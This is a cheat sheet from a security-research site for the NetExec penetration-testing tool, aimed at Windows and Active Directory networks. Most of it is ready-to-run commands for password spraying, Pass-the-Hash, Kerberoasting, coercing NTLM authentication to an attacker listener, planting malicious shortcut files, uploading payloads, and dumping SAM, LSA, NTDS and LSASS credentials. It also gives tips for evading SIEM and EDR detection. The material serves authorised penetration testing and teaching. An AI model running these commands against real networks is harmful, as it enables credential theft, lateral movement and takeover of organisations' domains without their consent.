Eye of Ra
SECURITY RESEARCHAsbawy
~ToolsNetExec.mdx
Tools·INTERMEDIATE
22 minsverified: 2026-09-14

NetExec (nxc) Cheat Sheet

Reference for NetExec (nxc). Covers multi-protocol enumeration (SMB, LDAP, WinRM, MSSQL, RDP, WMI, SSH, VNC, FTP), safe password spraying, credential harvesting, BloodHound CE collection, execution methods, and detection telemetry.

netexecnxcactive-directorypentestinglateral-movementtools
_

Understanding NetExec Architecture

NetExec (nxc) is the modern, actively maintained successor to CrackMapExec (cme). Built on a modular Python asynchronous architecture, it automates assessment tasks across nine distinct network protocols. Rather than executing disjointed scripts, NetExec unifies network discovery, authentication testing, credential harvesting, and remote execution into a single, cohesive interface.

Interactive Topology Matrix

NetExec Architecture & Protocol Pipeline

Explore how NetExec coordinates multi-protocol enumeration, credential harvesting, and execution.

NetExec Core Orchestrator (`nxc`)

Async Python Engine

Central dispatcher managing concurrent network sockets, rate-limiters, credential vaults, and community modules.

Pool: 100 Threads
DB: ~/.nxc

SMB / CIFS Deep Dive

Default Port: 445 / 139

Share enumeration, file spidering, relay target lists, local SAM/LSA dumping, and remote command execution.

OPSEC Profile:Medium Risk
Example Operational InvocationLive Syntax
nxc smb 10.10.10.0/24 -u 'Admin' -H 'hash...' --sam --lsa
Featured Modules:spider_pluslsassynanodumpslinkycoerce_plus
_

Installation & Setup

Install NetExec via pipx to isolate its dependencies and ensure access to modern protocol extensions and community modules.

~ / bash
# Install pipx and prerequisites
sudo apt update && sudo apt install -y pipx git python3-pip
 
# Ensure local pipx binaries are on PATH
pipx ensurepath
 
# Install latest release from GitHub
pipx install git+https://github.com/Pennyw0rth/NetExec
 
# Verify version and environment
nxc --version
 
# Upgrade NetExec to the latest commit
pipx upgrade NetExec

Tip: NetExec stores configuration files, protocol databases, and downloaded logs in ~/.nxc/. Protocol modules reside in ~/.nxc/modules/.

_

Global Options & The Built-in Database Engine

::Command Structure Anatomy

NetExec commands follow a modular structure: Protocol → Scope / Target → Authentication → Assessment Action / Module.

Interactive Syntax Dissector

NetExec Command Architecture & Token Anatomy

Click any token in the command stream below to inspect its operational mechanism, syntax rules, and alternatives.

SMB Share Spidering & Analysis

Identity & Credentials

auth

User authentication via NTLM Pass-the-Hash (PtH).

Token: -u 'Administrator' -H '8846f7eaee...'
Operational Mechanics

Accepts 32-character NT hashes, LM:NT pairs, plaintext passwords (-p), or Kerberos ticket caches (-k).

Alternative Formats & Syntax
-u 'Admin' -p 'Pass123'-u 'Admin' -H '8846...'-u 'jdoe' -k --use-kcache
Global FlagExample ValueOperational Behavior & Default
-t50 or 100Concurrent worker threads (default: 100 network scan, 50 command execution).
--timeout5Socket response threshold in seconds (default: 2.0s). Adjust higher over slow VPN links.
--jitter2-5Randomized pause range (seconds) injected between targets to defeat rate-based SIEM rules.
--delay10Static sleep interval (seconds) enforced between consecutive authentication attempts.
--continue-on-success(Flag)Continue auditing remaining accounts in a wordlist even after locating valid credentials.
--no-bruteforce(Flag)Enforces 1:1 pair matching (user1:pass1, user2:pass2) rather than Cartesian matrix spraying.
--local-auth(Flag)Directs authentication against the target's local SAM rather than domain Active Directory.
-k(Flag)Enforce Kerberos negotiation instead of NTLM (requires target FQDN, not IP).
--use-kcache(Flag)Read and inject valid Kerberos ticket-granting tickets directly from the environment cache.

::Target Specification Syntax

NetExec handles multiple target representations seamlessly:

~ / bash
# Single IPv4 or FQDN target
nxc smb 10.10.10.100
nxc smb dc01.corp.local
 
# Subnet via CIDR notation
nxc smb 10.10.10.0/24
 
# Explicit IP range
nxc smb 10.10.10.50-10.10.10.120
 
# Multi-target file (newline-delimited IPs, CIDRs, or hostnames)
nxc smb targets.txt

::The Built-in SQLite Database (nxc db)

Every successful authentication, discovered host, open share, and extracted credential hash is automatically indexed in NetExec's local SQLite store (~/.nxc/workspaces/).

~ / bash
# View active workspaces
nxc db
 
# Create and switch to a client-specific workspace
nxc db workspace create ClientAudit2026
nxc db workspace switch ClientAudit2026
 
# View all discovered hosts
nxc db hosts
 
# Filter hosts where SMB signing is disabled (relay targets)
nxc db hosts --signing-disabled
 
# View all stored credentials
nxc db creds
 
# Filter credentials with local admin privileges (pwned flag)
nxc db creds --pwn3d
 
# Export credentials in user:hash format for offline cracking
nxc db creds --export hashcat -o hashes.txt
_

Unified Multi-Protocol Architecture Matrix

NetExec supports nine network protocols out of the box. Use the matrix below to identify capabilities, default network ports, and supported execution mechanics.

ProtocolDefault PortPrimary Assessment FocusRemote ExecutionKey Modules Available
SMB445 / 139Host recon, share hunting, SAM/LSA/NTDS dumping, relayingYes (--exec-method)spider_plus, lsassy, nanodump, slinky, coerce_plus
LDAP(S)389 / 636AD directory objects, BloodHound CE ingest, AS-REP/KerberoastNoadcs, maq, pre2k, whisker, rbcd, ldap-checker
WinRM5985 / 5986Administrative PowerShell management, lateral movementYes (-x, -X)Native PowerShell execution
MSSQL1433Database auditing, xp_cmdshell execution, hash capturingYes (-x)mssql_priv, slinky
RDP3389NLA verification, user credential testing, desktop snapshotsNo--screenshot
WMI135 / RPCDCOM-based remote process invocationYes (-x, -X)Native process execution
SSH22Linux host auditing, key and credential sprayingYes (-x)Key file authentication (--key-file)
VNC5900Remote screen session validationNoScreen capture / password auth
FTP21Anonymous access, sensitive backup file harvestingNo--ls, --get
_

Authentication & Identity Mechanics

NetExec supports multiple authentication primitives. Mastering these flags prevents account lockouts and enables Pass-the-Hash, Kerberos ticket injection, and certificate-based PKINIT authentication.

::Null Sessions & Guest Accounts

~ / bash
# Test SMB anonymous null session (empty username and empty password)
nxc smb 10.10.10.100 -u '' -p ''
 
# Test default guest account access
nxc smb 10.10.10.100 -u 'guest' -p ''
 
# Test LDAP unauthenticated bind (anonymous search)
nxc ldap 10.10.10.100 -u '' -p ''

::Local Authentication vs Domain Authentication

By default, NetExec evaluates credentials against the target host's domain. When auditing standalone servers, workstations, or local administrator accounts, use --local-auth.

~ / bash
# Authenticate against Active Directory domain (CORP.LOCAL)
nxc smb 10.10.10.100 -d corp.local -u 'jdoe' -p 'Welcome2026!'
 
# Authenticate against the local workstation SAM database
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --local-auth

::Pass-the-Hash (PtH)

NetExec accepts NTLM hashes in either LM:NT format or raw 32-character NT hash format using the -H flag:

~ / bash
# Authenticate over SMB using NTLM hash (32-character NT string)
nxc smb 10.10.10.100 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c' --local-auth
 
# Authenticate over WinRM with NTLM hash
nxc winrm 10.10.10.100 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c' --local-auth
 
# Authenticate over WMI with NTLM hash
nxc wmi 10.10.10.100 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c' --local-auth

::Kerberos & Ticket Cache (KRB5CCNAME)

Using Kerberos avoids generating NTLM challenge-response pairs on the wire, making actions stealthier and bypassing NTLM-disabled environments.

~ / bash
# Request TGT and authenticate using Kerberos
nxc smb dc01.corp.local -u 'jdoe' -p 'Summer2026!' -k
 
# Authenticate using Kerberos AES-256 key instead of plaintext
nxc smb dc01.corp.local -u 'jdoe' --aesKey 'a8f47b2c0199e4f...32bytes' -k
 
# Use an existing Kerberos ccache ticket exported in environment
export KRB5CCNAME=/tmp/krb5cc_1000
nxc ldap dc01.corp.local --use-kcache
nxc smb dc01.corp.local --use-kcache

Warning: When using Kerberos (-k or --use-kcache), you must supply target hostnames (e.g. dc01.corp.local), not raw IP addresses, so that NetExec can construct valid Service Principal Names (SPNs).

::Certificate & PKINIT Authentication

NetExec supports Public Key Cryptography for Initial Authentication (PKINIT) using exported .pfx certificates or paired PEM files:

~ / bash
# Authenticate over LDAP using a PFX certificate bundle
nxc ldap dc01.corp.local -u 'jdoe' --pfx './certs/user_auth.pfx' -p 'PfxSecret2026!'
 
# Authenticate using separate PEM certificate and private key
nxc ldap dc01.corp.local -u 'jdoe' --cert-pem './certs/esc1_admin.crt' --key-pem './certs/esc1_admin.key'
_

Phase 1: Discovery, Recon & Misconfiguration Auditing

Begin an engagement with zero-privilege and unauthenticated enumeration to map signing policies, locate relay targets, and inspect password complexity rules.

::SMB Signing & Relay List Generation

SMB Relay attacks require targets where SMB message signing is not required (Signing: False). NetExec scans entire subnets and formats valid relay targets automatically.

~ / bash
# Discover network hosts and inspect SMB signing status
nxc smb 10.10.10.0/24
 
# Automatically output unsigned targets into a relay list for Responder/ntlmrelayx
nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt

::Domain Password Policy Auditing

Before conducting password spraying, always extract the domain password policy to determine the BadPasswordCount, LockoutDuration, and ResetLockoutCounter thresholds.

~ / bash
# Extract domain password policy via anonymous/null session
nxc smb 10.10.10.10 -u '' -p '' --pass-pol
 
# Extract password policy using valid domain credentials
nxc smb 10.10.10.10 -u 'jdoe' -p 'Welcome2026!' --pass-pol

Example Output Breakdown:

  • ▹Account Lockout Threshold: 5 (Spraying must not exceed 4 failed attempts within the reset window).
  • ▹Lockout Observation Window: 30 mins (Wait 31+ minutes before spraying the next candidate password).

::Share & IPC Enumeration

~ / bash
# Enumerate SMB shares and access permissions (READ, WRITE) with null session
nxc smb 10.10.10.0/24 -u '' -p '' --shares
 
# Enumerate shares with domain credentials across the entire subnet
nxc smb 10.10.10.0/24 -u 'jdoe' -p 'Welcome2026!' --shares
 
# Discover active user sessions on hosts
nxc smb 10.10.10.0/24 -u 'jdoe' -p 'Welcome2026!' --sessions
 
# Enumerate currently logged-on users across domain endpoints
nxc smb 10.10.10.0/24 -u 'jdoe' -p 'Welcome2026!' --loggedon-users

::RID Cycling / Brute-Forcing

When unauthenticated LDAP is blocked, query the local LSA/SAM interface via SMB SID resolution to discover domain users and groups:

~ / bash
# Brute-force RIDs starting from 500 up to 4000 via null session
nxc smb 10.10.10.10 -u '' -p '' --rid-brute 4000
 
# RID brute-force with valid low-privilege user
nxc smb 10.10.10.10 -u 'jdoe' -p 'Welcome2026!' --rid-brute 5000

::WebDAV & Coercion Prerequisite Detection

The WebClient (WebDAV) service on Windows workstations provides an HTTP attack vector for NTLM relaying to ADCS or LDAP.

~ / bash
# Identify hosts running the WebClient (WebDAV) service
nxc smb 10.10.10.0/24 -u 'jdoe' -p 'Welcome2026!' -M webdav
_

Phase 2: Credential Auditing & Password Spraying

Password spraying attempts one password against many users to prevent triggering lockout thresholds. Always calculate delays based on the discovered --pass-pol.

::Safe Password Spraying Execution

~ / bash
# Spray a single password against a list of domain users over SMB
# --continue-on-success ensures you discover all accounts sharing the password
nxc smb 10.10.10.10 -u users.txt -p 'Spring2026!' --continue-on-success
 
# Safe spray with a 10-second delay and 2-5 second jitter between queries
nxc smb 10.10.10.10 -u users.txt -p 'Autumn2026!' \
--continue-on-success \
--delay 10 \
--jitter 2-5

::1:1 Credential Testing (--no-bruteforce)

When testing credential lists obtained from external breach dumps or past compromises, pair each user with their corresponding password without doing a combinatorial cross-product:

~ / bash
# Test pairs: (user1:pass1), (user2:pass2) without cross-bruteforcing
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

::Cross-Protocol Validation

Once a credential set is validated, test access across other remote services:

~ / bash
# Verify if sprayed credentials work for remote administration via WinRM
nxc winrm 10.10.10.0/24 -u 'jdoe' -p 'Spring2026!'
 
# Test credentials on administrative database servers
nxc mssql 10.10.10.0/24 -u 'jdoe' -p 'Spring2026!'
 
# Test credentials on internal Linux appliances via SSH
nxc ssh 10.10.10.0/24 -u 'jdoe' -p 'Spring2026!'
_

Phase 3: Active Directory & LDAP Deep Dive

LDAP is the primary protocol for auditing Active Directory structures, certificate authorities, Kerberos tickets, and delegation misconfigurations.

::BloodHound CE Data Collection

NetExec includes a native BloodHound ingestor, eliminating the need to drop external binaries or PowerShell scripts on disk.

~ / bash
# Comprehensive BloodHound ingestion using TCP DNS
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' \
--bloodhound \
--collection All \
--dns-server 10.10.10.1 \
--dns-tcp
 
# Targeted collection focusing on Domain Controllers only
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' \
--bloodhound \
--collection DCOnly \
--dns-server 10.10.10.1

::Kerberoasting & AS-REP Roasting

Harvest Kerberos ticket hashes for offline cracking with Hashcat (modes 13100 and 18200):

~ / bash
# Query SPNs and extract Kerberoastable TGS ticket hashes
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --kerberoasting kerberoast_hashes.txt
 
# Extract AS-REP Roasting hashes for accounts with "Do not require Kerberos preauthentication"
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --asreproast asrep_hashes.txt
 
# Unauthenticated AS-REP Roasting test against a list of users
nxc ldap dc01.corp.local -u users.txt -p '' --asreproast asrep_unauth.txt

::ADCS (Active Directory Certificate Services) Audit

Locate Enterprise Certificate Authorities and vulnerable certificate templates (e.g. ESC1, ESC2, ESC3, ESC8):

~ / bash
# Enumerate Enterprise CAs and vulnerable certificate templates
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M adcs
 
# Specify target CA server for template attribute extraction
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M adcs -o SERVER=ca01.corp.local

::Delegation & Machine Account Quota (MAQ)

~ / bash
# Discover Unconstrained, Constrained, and Resource-Based Kerberos Delegation
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --find-delegation
 
# Inspect MachineAccountQuota (number of computer accounts an unprivileged user can register)
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M maq
 
# Identify Pre-Windows 2000 computer accounts
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M pre2k

::Group Managed Service Accounts (gMSA)

Accounts configured as gMSA have 128-character managed passwords rotated automatically by Active Directory. If an account has ReadGMSAPassword rights, NetExec extracts and decrypts the password blob:

~ / bash
# Enumerate all gMSA objects in the domain
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --gmsa
 
# Decrypt and compute the NTLM hash of a specific gMSA account
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --gmsa-decrypt-lsa 'gmsa_svc$'
_

Phase 4: Multi-Protocol Service Assessment

::WinRM Protocol (TCP 5985/5986)

WinRM provides native remote management for Windows hosts. If an account is part of Remote Management Users or Administrators, execution runs natively without creating SMB services.

~ / bash
# Execute command via cmd.exe over WinRM
nxc winrm 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -x 'whoami /all'
 
# Execute PowerShell expression over WinRM
nxc winrm 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -X 'Get-Process | Select-Object -First 5'
 
# Execute command across an entire IP subnet
nxc winrm 10.10.10.0/24 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c' -x 'hostname'

::MSSQL Protocol (TCP 1433)

NetExec interacts directly with Microsoft SQL Server instances using SQL native authentication, Windows domain authentication, or Kerberos.

~ / bash
# Authenticate using Windows Domain credentials against MSSQL
nxc mssql 10.10.10.50 -u 'jdoe' -p 'Welcome2026!' --windows-auth
 
# Authenticate using native SQL 'sa' account
nxc mssql 10.10.10.50 -u 'sa' -p 'DbAdmin2026!'
 
# Execute SQL query
nxc mssql 10.10.10.50 -u 'sa' -p 'DbAdmin2026!' -q "SELECT @@VERSION; SELECT SYSTEM_USER;"
 
# Execute operating system commands via xp_cmdshell (NetExec enables it automatically if privileged)
nxc mssql 10.10.10.50 -u 'sa' -p 'DbAdmin2026!' -x "whoami"
 
# Audit SQL Server database links and check for privilege escalation paths
nxc mssql 10.10.10.50 -u 'jdoe' -p 'Welcome2026!' --windows-auth -M mssql_priv

::RDP Protocol (TCP 3389)

Audit Network Level Authentication (NLA) status, validate credentials without establishing interactive sessions, and capture desktop screenshots.

~ / bash
# Verify RDP availability and test credential validity
nxc rdp 10.10.10.100 -u 'jdoe' -p 'Welcome2026!'
 
# Check for Restricted Admin mode (allows Pass-the-Hash over RDP)
nxc rdp 10.10.10.100 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c'
 
# Take an unauthenticated screenshot of the Windows lock screen to identify logged-on users
nxc rdp 10.10.10.100 --screenshot --res 1024x768

::Native WMI Protocol (TCP 135 / RPC)

Modern NetExec includes a native wmi protocol implementation that bypasses SMB port 445 entirely:

~ / bash
# Authenticate and execute commands via native WMI
nxc wmi 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -x 'whoami'
 
# WMI execution using NTLM Hash
nxc wmi 10.10.10.100 -u 'Administrator' -H '8846f7eaee8fb117ad06bdd830b7586c' -x 'ipconfig /all'

::SSH, FTP & VNC Operations

~ / bash
# SSH: Authenticate with plaintext password and run command
nxc ssh 10.10.10.75 -u 'root' -p 'toor' -x 'id; uname -a'
 
# SSH: Authenticate with an exported private SSH key
nxc ssh 10.10.10.75 -u 'ansible' --key-file /home/user/.ssh/id_rsa -x 'sudo -l'
 
# FTP: Verify anonymous access and list root files
nxc ftp 10.10.10.80 -u 'anonymous' -p '' --ls
 
# FTP: Download sensitive configuration file
nxc ftp 10.10.10.80 -u 'operator' -p 'FtpPass!' --get-file web.config ./web.config
 
# VNC: Check unauthenticated access or validate VNC passwords
nxc vnc 10.10.10.90 -p 'password123'
_

Phase 5: Share Spidering, File Hunting & Coercion

::Comprehensive Share Spidering (spider_plus)

The spider_plus module catalogs all accessible shares across an organization, producing a JSON tree of files while filtering out noise.

~ / bash
# Spider shares and output file metadata to ~/.nxc/logs/
nxc smb 10.10.10.0/24 -u 'jdoe' -p 'Welcome2026!' -M spider_plus
 
# Spider shares, excluding common administrative shares and setting maximum file size
nxc smb 10.10.10.100 -u 'jdoe' -p 'Welcome2026!' -M spider_plus \
-o EXCLUDE_DIR='IPC$,PRINT$,ADMIN$' \
MAX_FILE_SIZE=500000 \
OUTPUT_PATH=/tmp/spider_results.json
 
# Search shares specifically for sensitive extensions (passwords, keys, databases)
nxc smb 10.10.10.100 -u 'jdoe' -p 'Welcome2026!' -M spider_plus \
-o EXT_LIST='kdbx,docx,xlsx,config,vmdk,ovpn,id_rsa,pfx'

::File Upload & Download Operations

~ / bash
# Download a remote file from an SMB share
nxc smb 10.10.10.100 -u 'jdoe' -p 'Welcome2026!' \
--share 'Finance' \
--get-file 'QuarterlyReview.xlsx' ./QuarterlyReview.xlsx
 
# Upload a local file to a writable share
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' \
--share 'C$' \
--put-file ./payload.exe 'Windows\Temp\payload.exe'

::Authentication Coercion Suite

Coerce machine accounts into authenticating to an attacker-controlled listener (e.g. Responder, ntlmrelayx) using MS-RPRN or MS-EFSR protocols:

~ / bash
# Multi-protocol coercion module (PetitPotam, DFSCoerce, ShadowCoerce)
nxc smb 10.10.10.10 -u 'jdoe' -p 'Welcome2026!' -M coerce_plus -o LISTENER=10.10.14.5
 
# Coerce via PetitPotam (MS-EFSR)
nxc smb 10.10.10.10 -u 'jdoe' -p 'Welcome2026!' -M petitpotam -o LISTENER=10.10.14.5
 
# Coerce via PrintBug (MS-RPRN Printer Spooler)
nxc smb 10.10.10.10 -u 'jdoe' -p 'Welcome2026!' -M printerbug -o LISTENER=10.10.14.5

::Malicious Shortcut Injection (slinky)

Place .lnk files in writable network shares to coerce NTLM hashes when domain users navigate to the folder in Windows Explorer:

~ / bash
# Plant malicious shortcut referencing an attacker SMB listener
nxc smb 10.10.10.100 -u 'jdoe' -p 'Welcome2026!' \
--share 'Public' \
-M slinky -o SERVER=10.10.14.5 NAME='Payroll_2026.lnk'
 
# Clean up shortcut files after testing
nxc smb 10.10.10.100 -u 'jdoe' -p 'Welcome2026!' \
--share 'Public' \
-M slinky -o CLEANUP=True NAME='Payroll_2026.lnk'
_

Phase 6: Credential Extraction & Secrets Harvesting

Once administrative access ((Pwn3d!)) is confirmed, extract credentials from local storage, Active Directory databases, or process memory.

::Local Credential Extraction (SAM, LSA, DPAPI)

~ / bash
# Dump the local SAM database (extracts RID 500 and local user NTLM hashes)
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --local-auth --sam
 
# Dump LSA Secrets (service credentials, autologon passwords, scheduled task accounts)
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --local-auth --lsa
 
# Dump DPAPI system backup keys and credential vault blobs
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --local-auth --dpapi
 
# Extract all local stores simultaneously
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --local-auth --sam --lsa --dpapi

::Domain NTDS.dit Extraction

Extracting NTDS.dit provides password hashes for every account in the Active Directory domain.

~ / bash
# Dump domain password hashes via DRSUAPI (vss/drsuapi replication protocol)
nxc smb dc01.corp.local -u 'Administrator' -p 'P@ssw0rd123' --ntds
 
# Target a single high-value user to minimize network noise
nxc smb dc01.corp.local -u 'Administrator' -p 'P@ssw0rd123' --ntds --user krbtgt
 
# Extract NTDS.dit using ntdsutil Volume Shadow Copy (alternative if DRSUAPI is monitored)
nxc smb dc01.corp.local -u 'Administrator' -p 'P@ssw0rd123' -M ntdsutil

::LAPS Password Extraction (Legacy & Windows LAPS)

Local Administrator Password Solution (LAPS) stores randomized local admin passwords in Active Directory attributes. NetExec queries both legacy and modern Windows LAPS schemas:

~ / bash
# Enumerate LAPS passwords via SMB
nxc smb dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --laps
 
# Enumerate LAPS passwords via LDAP
nxc ldap dc01.corp.local -u 'jdoe' -p 'Welcome2026!' --laps

Note: Legacy LAPS utilizes the attribute ms-Mcs-AdmPwd (plaintext), whereas modern Windows LAPS (Windows 11 / Server 2022+) stores passwords in msLAPS-Password (optionally encrypted). NetExec handles schema negotiation automatically.

::LSASS Process Memory Dumping

Dumping lsass.exe directly often alerts modern EDR solutions. NetExec integrates multiple specialized modules designed to minimize detection:

~ / bash
# Extract credentials using lsassy (modular remote LSASS dump & parsing)
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -M lsassy
 
# Use NanoDump to create a mini-dump with handle duplication and spoofed signatures
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -M nanodump
 
# Use HandleKatz to dump LSASS using existing process handles
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -M handlekatz

::Group Policy Preference (GPP) Passwords

Legacy Domain Controllers often retain encrypted passwords in SYSVOL policy XML files (Groups.xml, Services.xml). NetExec recovers and decrypts them using the static Microsoft AES private key:

~ / bash
# Search SYSVOL for GPP passwords and decrypt cpassword attributes
nxc smb dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M gpp_password
 
# Search for GPP AutoLogon credentials stored in registry XML files
nxc smb dc01.corp.local -u 'jdoe' -p 'Welcome2026!' -M gpp_autologin
_

Phase 7: Execution Methods & Tradecraft Matrix

When executing commands over SMB, NetExec provides multiple backend mechanisms configured via --exec-method. Choosing the appropriate method depends on the target's operating system version and endpoint security posture.

~ / bash
# Default execution: wmiexec
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' -x 'whoami'
 
# Force execution via smbexec
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --exec-method smbexec -x 'net user'
 
# Force execution via atexec (Task Scheduler)
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --exec-method atexec -x 'ipconfig'
 
# Force execution via mmcexec (COM object)
nxc smb 10.10.10.100 -u 'Administrator' -p 'P@ssw0rd123' --exec-method mmcexec -x 'whoami'

::Under-The-Hood Execution Comparison

MethodProtocol / APIService Created?Output Delivery MechanismForensic Indicator
wmiexecDCOM (135) / WMI (Win32_Process)NoOutput written to temp file via cmd.exe /c redirected to ADMIN$ or C$Process creation with parent WmiPrvSE.exe
smbexecRPC / Service Control Manager (SVCCTL)YesTemporary Windows service executes .bat script, pipes to __output share file, deletes serviceWindows Event ID 7045 / 4697 generated
atexecRPC / Task Scheduler (ATSVC / ITaskScheduler)NoCreates scheduled task set to run immediately, extracts output from temp file, deletes taskWindows Event ID 4698 (Scheduled Task created)
mmcexecDCOM (MMC20.Application)NoInvokes Document.ActiveView.ExecuteShellCommand via COMSpawned process child of mmc.exe

Key Rule: Avoid smbexec against environments monitored by SIEM or EDR, because creating and instantly deleting a service triggers high-confidence detection rules (7045). Prefer wmiexec or native winrm.